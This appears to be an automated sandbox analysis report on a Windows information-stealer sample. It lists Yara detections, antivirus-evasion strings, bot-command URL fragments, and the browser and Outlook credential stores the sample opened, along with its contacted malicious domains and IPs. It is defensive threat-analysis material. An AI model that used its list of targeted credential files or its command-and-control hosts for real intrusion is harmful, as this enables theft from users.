Source: MpSigStub.exe, 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: ravtask.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: McShield.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp Binary or memory string: regedit.com
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: license.rtf.|!\SavService.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: regmon.exe

Stealing of Sensitive Information:

barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Generic Dropper
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1gPmnCR2PX.exe, 00000006.00000000.18137281855.0000000000426000.00000002.00020000.sdmp String found in binary or memory: CompanyNameAssoElectrum@
Source: 1gPmnCR2PX.exe String found in binary or memory: ElectronCash\wallets
Source: mpam-728dfe11.exe, 00000011.00000003.18607138179.0000027770048000.00000004.00000001.sdmp String found in binary or memory: 0B5Jaxx
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: secondexodusrealtors.co.ke
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: ETHEREUMSTRATUM
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\pkcs11.txt
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt
Yara detected Credential Stealer
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18306864011.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1603 Sample: 1gPmnCR2PX.exe Startdate: 12/10/2021 Architecture: WINDOWS Score: 100 56 sopage.duckdns.org 2->56 58 telemirror.top 2->58 60 prda.aadg.msidentity.com 2->60 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 64 other signatures 2->74 7 mpam-728dfe11.exe 351 2->7         started        11 1gPmnCR2PX.exe 1 2->11         started        13 mpam-796ed98e.exe 7 2->13         started        15 2 other processes 2->15 signatures3 process4 file5 42 C:\Windows\...\mpuxagent.dll.mui, PE32 7->42 dropped 44 C:\Windows\...\ProtectionManagement.dll.mui, PE32 7->44 dropped 46 C:\Windows\...\MpEvMsg.dll.mui, PE32 7->46 dropped 54 193 other files (none is malicious) 7->54 dropped 84 Sample is not signed and drops a device driver 7->84 17 MpSigStub.exe 3 14 7->17         started        86 Tries to detect Any.run 11->86 88 Hides threads from debuggers 11->88 19 1gPmnCR2PX.exe 11->19         started        48 C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+ 13->48 dropped 50 C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+ 13->50 dropped 52 C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+ 13->52 dropped 24 MpSigStub.exe 4 13->24         started        26 conhost.exe 15->26         started        28 conhost.exe 15->28         started        signatures6 process7 dnsIp8 62 sopage.duckdns.org 23.146.242.85, 49815, 80 VDI-NETWORKUS Reserved 19->62 64 5.181.156.229, 49817, 80 MIVOCLOUDMD Moldova Republic of 19->64 66 telemirror.top 104.21.31.246, 49816, 80 CLOUDFLARENETUS United States 19->66 30 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 19->30 dropped 32 C:\Users\user\AppData\...\vcruntime140.dll, PE32 19->32 dropped 34 C:\Users\user\AppData\...\ucrtbase.dll, PE32 19->34 dropped 40 56 other files (none is malicious) 19->40 dropped 76 Tries to steal Mail credentials (via file access) 19->76 78 Tries to harvest and steal browser information (history, passwords, etc) 19->78 80 Tries to detect Any.run 19->80 82 Hides threads from debuggers 19->82 36 C:\Windows\ServiceProfiles\...\mpavbase.vdm, PE32+ 24->36 dropped 38 C:\Windows\ServiceProfiles\...\mpasbase.vdm, PE32+ 24->38 dropped file9 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
5.181.156.229
 unknown Moldova Republic of
39798 MIVOCLOUDMD true
104.21.31.246
 telemirror.top United States
13335 CLOUDFLARENETUS false
23.146.242.85
 sopage.duckdns.org Reserved
46664 VDI-NETWORKUS true

Contacted Domains

Name IP Active
telemirror.top 104.21.31.246 true
sopage.duckdns.org 23.146.242.85 true